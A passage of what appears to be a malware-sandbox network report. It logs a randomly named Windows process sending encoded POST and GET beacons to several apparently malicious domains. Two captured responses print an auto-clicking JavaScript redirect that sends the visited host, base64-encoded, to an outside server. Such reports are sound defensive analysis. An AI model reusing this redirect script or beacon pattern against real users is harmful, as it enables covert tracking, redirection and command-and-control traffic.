                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            6192.168.2.84971623.225.160.132805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:30:01.701118946 CET490OUTGET /sgdd/?jNn=n1rc2pzYlnLUqZJmqzqSU8jwiNDNG2kr4Asv9klFc/49ZVn3If5xE9SNYfvTzAEQBq2X9buCd1WXrrlhdqeZSiHxO15Gr8xk7hOHDVFXExJKBXBlW4uFPtlrZZXFJuvZOA==&3P=ZxaxIFQ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.laohub10.net
                                                                            Connection: close
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Jan 11, 2025 03:30:02.201824903 CET533INHTTP/1.1 200 OK
                                                                            Server: Apache
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Accept-Ranges: bytes
                                                                            Cache-Control: max-age=86400
                                                                            Age: 1
                                                                            Connection: Close
                                                                            Content-Length: 358
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED]
                                                                            Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.849717149.88.81.190805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:30:07.762860060 CET745OUTPOST /rq1s/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.xcvbj.asia
                                                                            Origin: http://www.xcvbj.asia
                                                                            Referer: http://www.xcvbj.asia/rq1s/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 204
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 6d 73 79 56 74 71 48 67 47 4a 33 6e 30 6e 2b 6c 65 58 2f 62 76 58 31 6d 69 43 48 37 42 35 53 36 6b 4e 68 56 4e 47 75 73 65 31 2f 31 6d 36 6f 63 4f 4d 76 6e 76 7a 63 4d 5a 30 45 53 76 6e 6b 31 39 79 59 67 31 42 33 73 61 6f 32 67 79 70 45 6e 64 71 2f 74 6f 42 30 53 79 43 57 4e 41 73 4c 51 71 74 6f 74 61 57 59 77 68 32 31 73 51 75 57 64 76 6e 6b 4e 4b 53 7a 42 4f 4b 79 47 6e 64 46 75 49 61 44 48 2f 41 2b 44 38 4a 79 39 2b 58 4c 35 75 68 6e 4a 30 4c 71 50 6b 32 47 68 58 69 73 76 6d 4e 52 31 51 61 34 64 4d 37 33 53 4c 49 71 61 43 6f 37 67 4b 49 38 4f 41 51 3d
                                                                            Data Ascii: jNn=xj4K+ejgT/JOWmsyVtqHgGJ3n0n+leX/bvX1miCH7B5S6kNhVNGuse1/1m6ocOMvnvzcMZ0ESvnk19yYg1B3sao2gypEndq/toB0SyCWNAsLQqtotaWYwh21sQuWdvnkNKSzBOKyGndFuIaDH/A+D8Jy9+XL5uhnJ0LqPk2GhXisvmNR1Qa4dM73SLIqaCo7gKI8OAQ=


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.2.849718149.88.81.190805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:30:10.317536116 CET765OUTPOST /rq1s/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.xcvbj.asia
                                                                            Origin: http://www.xcvbj.asia
                                                                            Referer: http://www.xcvbj.asia/rq1s/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 224
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 48 63 79 55 4d 71 48 6f 47 4a 34 69 30 6e 2b 77 75 58 7a 62 76 62 31 6d 6a 32 58 37 55 52 53 6a 41 42 68 62 70 61 75 67 2b 31 2f 39 47 36 70 53 75 4d 6b 6e 76 32 70 4d 59 59 45 53 72 50 6b 31 2f 36 59 68 47 70 30 75 4b 6f 6a 35 43 70 47 6a 64 71 2f 74 6f 42 30 53 79 6e 37 4e 42 49 4c 4d 4c 64 6f 73 37 57 62 7a 68 32 79 72 51 75 57 5a 76 6e 67 4e 4b 53 30 42 4c 54 36 47 6b 31 46 75 49 4b 44 47 75 41 2f 5a 73 4a 38 35 2b 57 65 35 64 56 6a 42 57 2f 6b 53 43 6d 46 6d 30 4b 75 71 51 38 37 76 79 53 2b 65 4d 54 63 53 49 67 63 66 31 31 54 36 70 59 4d 51 58 47 4c 64 38 4e 55 69 67 6f 71 51 36 72 69 58 4d 6d 58 46 6a 64 74
                                                                            Data Ascii: jNn=xj4K+ejgT/JOWHcyUMqHoGJ4i0n+wuXzbvb1mj2X7URSjABhbpaug+1/9G6pSuMknv2pMYYESrPk1/6YhGp0uKoj5CpGjdq/toB0Syn7NBILMLdos7Wbzh2yrQuWZvngNKS0BLT6Gk1FuIKDGuA/ZsJ85+We5dVjBW/kSCmFm0KuqQ87vyS+eMTcSIgcf11T6pYMQXGLd8NUigoqQ6riXMmXFjdt


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            9192.168.2.849719149.88.81.190805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:30:12.858727932 CET1782OUTPOST /rq1s/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.xcvbj.asia
                                                                            Origin: http://www.xcvbj.asia
                                                                            Referer: http://www.xcvbj.asia/rq1s/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 1240
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 78 6a 34 4b 2b 65 6a 67 54 2f 4a 4f 57 48 63 79 55 4d 71 48 6f 47 4a 34 69 30 6e 2b 77 75 58 7a 62 76 62 31 6d 6a 32 58 37 55 4a 53 2f 6c 64 68 55 6f 61 75 68 2b 31 2f 69 32 36 73 53 75 4d 35 6e 72 61 6c 4d 5a 6b 55 53 74 4c 6b 30 61 32 59 77 48 70 30 30 61 6f 6a 6b 79 70 4c 6e 64 72 39 74 6f 52 4b 53 79 58 37 4e 42 49 4c 4d 49 56 6f 39 71 57 62 2f 42 32 31 73 51 75 4b 64 76 6d 33 4e 4b 61 43 42 4c 65 59 47 56 56 46 74 6f 36 44 46 63 34 2f 53 73 4a 2b 31 65 58 64 35 64 49 39 42 57 7a 4f 53 43 37 67 6d 33 71 75 6f 32 70 57 31 79 57 32 48 38 50 6f 5a 4a 4d 76 66 57 51 78 33 4f 31 35 55 56 2f 70 63 4d 4a 64 6c 78 6f 59 55 61 4b 4c 41 49 54 43 50 6d 73 79 4d 5a 63 34 78 6f 46 68 65 6f 69 63 4b 49 55 2f 6c 50 65 43 50 76 71 73 6b 6a 46 72 79 39 64 69 39 66 58 78 31 77 53 74 4b 42 6b 2f 57 42 46 34 50 61 47 37 4f 77 47 75 74 30 34 35 70 42 38 75 2b 7a 4d 37 38 64 37 52 2b 56 76 32 35 51 37 6d 58 32 58 71 6e 4c 54 55 51 4b 46 65 38 4a 39 4e 6e 38 2f 44 66 6e 2b 37 43 2f 34 2b 6a 58 71 6c 46 53 [TRUNCATED]
                                                                            Data Ascii: jNn=xj4K+ejgT/JOWHcyUMqHoGJ4i0n+wuXzbvb1mj2X7UJS/ldhUoauh+1/i26sSuM5nralMZkUStLk0a2YwHp00aojkypLndr9toRKSyX7NBILMIVo9qWb/B21sQuKdvm3NKaCBLeYGVVFto6DFc4/SsJ+1eXd5dI9BWzOSC7gm3quo2pW1yW2H8PoZJMvfWQx3O15UV/pcMJdlxoYUaKLAITCPmsyMZc4xoFheoicKIU/lPeCPvqskjFry9di9fXx1wStKBk/WBF4PaG7OwGut045pB8u+zM78d7R+Vv25Q7mX2XqnLTUQKFe8J9Nn8/Dfn+7C/4+jXqlFSMdCLIkw/STqEVxluvhR65C/53cFUngoj7pGH0C1M6Q9E/ohAmHdu52d2B+v91Lwiph01Xadcm+13L+9s+FS/OgS3hpYBQd8VNlv/045AVIcjm6fJcx476mFo1e1pcbv4eI8gA02+XazVEJGPCq2pyGFYjTSbMEuwZ96/orBKG1mE3TY+Id8JSHc4EPjdPZGA+YnFOkxJrtkUCxC/H6+SCQr7m6dFCJevLn4/E33tktaqc04U5/wDvpGJXT1d1vphyHWcuVgsbjyFk+iIsMs5IMJyHEH8q+k86D6ZhNoaHk0CvOT70RGiXNQ7ZFCeK+n6K6jdD5IKFBTdma3UN2BMkehI6WOTpvKdqayAooSv/ncApjQ+uYs8+lRfOvX0QUUitJWRlBKOlZNg059XSx1mGU1TExEA+TdRWzR/A5NhlQV+Mj4w2I5gU+hYFHIOqSQOjFEBGKuxar880WOXaiaxUEDPZBzzEWNLMRL/hpJDxelnfZPES9tZkO/4i9zRb/5tqsSSzV3xlnPp0RkYZhjdI8KSOWwpS0rxMdqTJzeTY4gAOxlrpEJVbl2uk0V7KS6Hra40XL/bLE/ej1iAwWJxtcMlz/JmnTv8YQrCO6ouOICLz4EEUwwnv5eT16GqODfi6aab5NLGWGGPBPd21fl/UCVT8JEZgRaTig [TRUNCATED]


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            10192.168.2.849720149.88.81.190805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:30:15.404853106 CET488OUTGET /rq1s/?jNn=8hQq9qCyJ4Zif0saVOr0qkV3vmys7vn3Uoj6jh6BmUV+5nttWKyOk55u+nexa6w5x5vVR/Acbsni3tLbmGpF1bV5lTdIrZK4z5JaRyWkNAYPXYBCqbiI2n7IpSyVWea/Pg==&3P=ZxaxIFQ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.xcvbj.asia
                                                                            Connection: close
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            11192.168.2.84972385.159.66.93805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:30:41.900368929 CET754OUTPOST /rum2/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.soainsaat.xyz
                                                                            Origin: http://www.soainsaat.xyz
                                                                            Referer: http://www.soainsaat.xyz/rum2/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 204
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 48 76 61 4c 35 69 4c 4f 6e 76 2f 34 51 4c 46 73 55 76 70 33 64 52 50 66 41 65 6b 6c 74 38 6a 32 30 31 6b 36 42 69 4c 61 61 44 58 6c 41 33 53 6d 49 6d 59 33 68 71 72 33 43 6b 4e 56 6c 4b 37 37 64 73 77 31 48 49 73 30 52 4e 61 73 73 39 53 55 56 44 61 76 34 71 5a 4c 55 78 2b 46 64 58 4b 44 33 33 72 38 37 59 32 59 59 76 55 48 59 73 63 4a 6f 48 78 43 71 44 4b 5a 33 43 55 57 42 2f 36 77 57 65 4f 66 41 57 6f 4f 58 6f 79 69 55 6c 72 46 4b 4a 52 6f 35 56 2f 47 31 75 31 4b 5a 76 62 32 41 53 55 37 38 47 34 36 67 2f 62 71 4e 76 67 69 4f 70 44 73 6e 43 49 47 6e 45 3d
                                                                            Data Ascii: jNn=8OxGdHNGhDPGSHvaL5iLOnv/4QLFsUvp3dRPfAeklt8j201k6BiLaaDXlA3SmImY3hqr3CkNVlK77dsw1HIs0RNass9SUVDav4qZLUx+FdXKD33r87Y2YYvUHYscJoHxCqDKZ3CUWB/6wWeOfAWoOXoyiUlrFKJRo5V/G1u1KZvb2ASU78G46g/bqNvgiOpDsnCIGnE=


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            12192.168.2.84972485.159.66.93805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:30:44.441673040 CET774OUTPOST /rum2/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.soainsaat.xyz
                                                                            Origin: http://www.soainsaat.xyz
                                                                            Referer: http://www.soainsaat.xyz/rum2/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 224
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 6e 2f 61 4a 61 36 4c 62 58 76 38 33 77 4c 46 37 45 76 74 33 64 64 50 66 46 2b 30 6c 66 59 6a 31 56 46 6b 67 46 32 4c 5a 61 44 58 72 67 33 54 73 6f 6d 47 33 68 75 56 33 47 6b 4e 56 6c 75 37 37 66 45 77 31 51 63 76 6d 78 4e 45 6b 4d 39 51 61 31 44 61 76 34 71 5a 4c 55 31 55 46 65 6e 4b 45 48 48 72 39 65 30 31 56 34 76 58 41 59 73 63 43 49 48 31 43 71 44 53 5a 79 62 50 57 44 48 36 77 57 4f 4f 65 56 36 72 48 58 6f 30 2f 45 6c 31 4c 2f 77 31 74 49 6c 49 4c 56 71 46 44 2f 72 32 36 57 6a 2b 68 65 4f 2b 35 67 58 77 71 4f 48 57 6e 35 30 72 32 45 53 34 59 77 53 43 31 7a 6e 6f 2b 55 6b 76 72 69 42 55 53 42 34 5a 4d 65 56 62
                                                                            Data Ascii: jNn=8OxGdHNGhDPGSn/aJa6LbXv83wLF7Evt3ddPfF+0lfYj1VFkgF2LZaDXrg3TsomG3huV3GkNVlu77fEw1QcvmxNEkM9Qa1Dav4qZLU1UFenKEHHr9e01V4vXAYscCIH1CqDSZybPWDH6wWOOeV6rHXo0/El1L/w1tIlILVqFD/r26Wj+heO+5gXwqOHWn50r2ES4YwSC1zno+UkvriBUSB4ZMeVb


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            13192.168.2.84972585.159.66.93805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:30:46.994822979 CET1791OUTPOST /rum2/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.soainsaat.xyz
                                                                            Origin: http://www.soainsaat.xyz
                                                                            Referer: http://www.soainsaat.xyz/rum2/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 1240
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 38 4f 78 47 64 48 4e 47 68 44 50 47 53 6e 2f 61 4a 61 36 4c 62 58 76 38 33 77 4c 46 37 45 76 74 33 64 64 50 66 46 2b 30 6c 66 51 6a 31 6e 4e 6b 36 69 4b 4c 59 61 44 58 30 51 33 65 73 6f 6e 44 33 6c 43 52 33 47 67 33 56 6e 6d 37 39 4f 6b 77 69 52 63 76 2f 42 4e 45 6d 4d 39 54 55 56 43 61 76 34 61 6e 4c 55 46 55 46 65 6e 4b 45 42 4c 72 72 37 59 31 58 34 76 55 48 59 73 41 4a 6f 48 64 43 71 62 6f 5a 7a 4b 36 57 54 6e 36 78 79 53 4f 64 6e 69 72 49 58 6f 32 38 45 6b 6d 4c 2f 30 71 74 4c 42 45 4c 57 32 38 44 34 6e 32 34 51 32 71 78 65 57 70 76 68 50 6c 6e 4a 48 54 2b 70 77 66 35 6c 47 41 48 67 71 52 39 32 48 6c 2f 47 38 75 72 52 6b 46 51 32 45 64 4f 36 74 50 76 6f 47 57 67 74 67 52 63 42 78 52 52 75 58 35 68 58 64 54 58 57 35 36 30 42 6a 51 6a 71 7a 77 62 68 71 59 35 52 6b 57 46 2b 6a 35 66 5a 6e 62 4b 74 55 45 68 6e 54 50 35 39 44 4d 66 43 67 47 4f 64 75 42 62 65 35 5a 52 7a 61 48 4c 2b 43 48 44 47 46 34 6c 47 57 32 52 72 78 74 46 33 74 4e 35 30 41 55 79 4d 57 68 64 72 4e 2b 4d 6c 30 42 47 32 [TRUNCATED]
                                                                            Data Ascii: jNn=8OxGdHNGhDPGSn/aJa6LbXv83wLF7Evt3ddPfF+0lfQj1nNk6iKLYaDX0Q3esonD3lCR3Gg3Vnm79OkwiRcv/BNEmM9TUVCav4anLUFUFenKEBLrr7Y1X4vUHYsAJoHdCqboZzK6WTn6xySOdnirIXo28EkmL/0qtLBELW28D4n24Q2qxeWpvhPlnJHT+pwf5lGAHgqR92Hl/G8urRkFQ2EdO6tPvoGWgtgRcBxRRuX5hXdTXW560BjQjqzwbhqY5RkWF+j5fZnbKtUEhnTP59DMfCgGOduBbe5ZRzaHL+CHDGF4lGW2RrxtF3tN50AUyMWhdrN+Ml0BG2Mx4+s2XKBJvY+O+SvB23663qEOt3qjS+vU6Rd/L0O+Ds6+Hjklmo2r8AHORO5clcNBH5bMgkYpLkUOEvAD4sDScpJa+KcbbIC7ZBSqaALrbS71Rf4EbCmnPkatdzofAv3Odyzt3ObbKMhbb4lzJ4pPtO2EWMVPIWYZ/m23V6Sody2EFgjMHiaatSjcFnPW0N/+gyRPRPCrOKELQ4SQomWiJwJtor/HZNPLYJOz+A684QZd5ngRUX7AJYEUWW1XqsgDcBgw3Oz3IzAZpTSl6rqJ/806BhdCyB3b9KKjNwBaey+3oc7uYy0s/AoqMpal3CdUJrLvFYwdaySgfEXMkJri9TCjgGVxpMaat/C18IqOgyiIdmVHMG3OZ6692sS6psw8vU5hkccfK+IF1tBXP5xiSh7rQjoAM3VPzepcAToUVIY2tOxlalMz8vAiKRC27de3ScKTPmeDre2t6IQNeXmgWNWzuz7jS6IVvrKmR7IpzLvCoyXqzkxCt0nlI3V/yhU3W5avD9EAEfXLBJDeOMQlfm4CA1jT3ZJ46KtNjMtJbNH7/0z8iNltTi67vq69RzVDGTc+4SRp22c9bi4M1fhiyc9HdUv8/I1/yNUas3hoTRhj3urxRDJNwUJ8ibd59Yll0wnbxnD36Iw9hAOhpTon0MZUUKiJanAq [TRUNCATED]


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            14192.168.2.84972685.159.66.93805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:30:49.544825077 CET491OUTGET /rum2/?jNn=xMZmeyR85UPBdQXGVprUO1LR43iXmFfPz7pkSG2xpPpRtldOsCO9Ua+kpATSmsrk0H+UwmANflnCrdxtiygBnjZcvZIWQQve7723Pk1HFbXKcmbX65Etfa2fBZEFB8aOdg==&3P=ZxaxIFQ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.soainsaat.xyz
                                                                            Connection: close
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Jan 11, 2025 03:31:50.256149054 CET194INHTTP/1.0 504 Gateway Time-out
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            15192.168.2.849727185.27.134.144805960C:\Program Files (x86)\qguwwOAnqKiEBjpxsRJEziZuPrAOIlOOiJiETDzsUojyv\LbtMpScwNRqrVB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 11, 2025 03:31:55.346839905 CET748OUTPOST /d9ku/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US
                                                                            Host: www.amayavp.xyz
                                                                            Origin: http://www.amayavp.xyz
                                                                            Referer: http://www.amayavp.xyz/d9ku/
                                                                            Cache-Control: no-cache
                                                                            Content-Length: 204
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                            Data Raw: 6a 4e 6e 3d 6c 43 4f 75 5a 30 70 64 4d 4e 79 74 5a 57 4a 61 48 49 4b 66 4d 46 42 50 74 47 64 6d 78 6d 69 75 48 54 31 74 42 76 37 55 58 41 6c 63 6d 52 6f 59 75 43 61 68 63 33 63 46 51 57 71 72 41 30 4a 31 74 50 72 44 4e 43 50 61 69 4d 51 67 72 4e 5a 34 6c 74 4e 4b 4b 63 6e 6c 74 70 71 61 42 7a 39 4d 37 75 53 67 68 6e 55 6c 37 49 49 6e 64 4d 78 44 45 46 70 30 48 74 51 34 44 51 4e 70 6b 59 7a 62 38 4b 7a 6b 6b 6a 6c 4c 57 78 53 41 77 71 4b 37 6c 76 41 46 44 5a 45 6c 64 75 58 6d 36 45 42 6d 74 49 45 4f 62 48 33 4a 67 61 77 30 7a 4a 58 2b 33 55 4a 30 63 47 63 50 4e 55 70 34 4b 49 6e 70 62 51 41 4d 4c 64 4d 3d
